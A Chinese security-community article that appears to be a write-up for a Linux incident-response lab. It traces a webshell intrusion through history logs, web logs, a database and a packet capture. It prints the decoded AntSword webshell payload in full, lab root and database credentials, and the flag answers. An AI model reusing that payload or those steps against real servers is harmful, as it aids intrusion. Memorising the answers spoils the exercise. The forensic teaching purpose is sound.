点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
题目
前景需要:看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
挑战内容
1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3
相关账户密码
root/Inch@957821.
关于解题
root下,运行"./wp"即可
下载地址
百度网盘链接:https://pan.baidu.com/s/1dZ6TXgLsOiP95oOWyi11wA?pwd=mapi
解题
这里建议大家用xshell解题
首先查看历史命令
可以得到的信息:首先关闭了防火墙而且删除了flag1和flag2还有一个version.php得到了一个flag3以及修改了alinotify.php和mpnotify.php然后我们继续往下看
题目为查看webshell告警了希望我们帮他分析那我们去分析web日志/var/www
我们去看127.0.0.1.log有哪些东西
发现了192.168.20.1这哥们在捣鬼而且发现了可疑的version2.php文件然后继续找
攻击者修改的管理员密码(明文)
我们查看本机开放了哪些端口
netstat -anp
发现3306mysql现在我们得登录上数据库才可以知道被修改的管理员密码
之前我们发现www/wwwlog目录下面有access.log
可以确定为phpmyadmin直接去找配置文件在/www/wwwroot/127.0.0.1/lib目录下config.inc.php
得到数据库账号密码:kaoshi: 5Sx8mK5ieyLPb84m
登录在kaoshi库中的x2_user_group中发现管理员在x2_user中发现被修改的密码
加密密码为:f6f6eb5ace977d7e114377cc7098b7e3
明文密码为:Network@2020(各位师傅们自行解密即可)
flag1
这有一个名为数据包的文件我们把它放在wireshark中打开我们将数据包下载下来放在我们本地的wireshark中
靶机利用python2开启http服务传到本地
systemctl status firewalld
systemctl stop firewalld
python --version
ip a
python -m SimpleHTTPServer
在本地打开发现192.168.20.1这哥们基本确定了他就是攻击者
利用http and ip.src=192.168.20.1检索发现flag1
追踪数据流发现flag
flag1{Network@_2020_Hack}
第一次连接webshell的url及木马文件
通过分析数据包发现url及木马文件
index.php?user-app-register
version2.php
webshell连接密码
通过数据包发现webshell加密流量
进行url解码发现php代码只有蚁剑才会明文传输确定为蚁剑流量且密码为Network2020
Network2020=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.fd491f470fb7";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return $out;
}
;
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "4a0c"."dc70";
echo @asenc($output);
echo "db6"."da5";
}
ob_start();
try {
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}";
if(substr($D,0,1)!="/") {
foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
} else {
$R.="/";
}
$R.="";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="{$s}";
echo $R;
;
}
catch(Exception $e) {
echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
flag2
我们通过history命令可以看到这哥们做贼心虚把version2.php删了对.api文件夹做了手脚还修改了alinotify.php文件我们用diff命令对比
diff
找到flag2
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
总结
1.攻击者192.168.20.1通过/index.php?user-app-register上传了一个webshell
2.通过蚁剑连接之后在上传version2.php提权
3.修改数据库密码
4.提权之后关闭了防火墙,并且删除提权文件version2.php和falg1且修改了alinotify.php文件
原文始发于微信公众号(SecHub网络安全社区):应急响应靶机-Linux(2)-WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论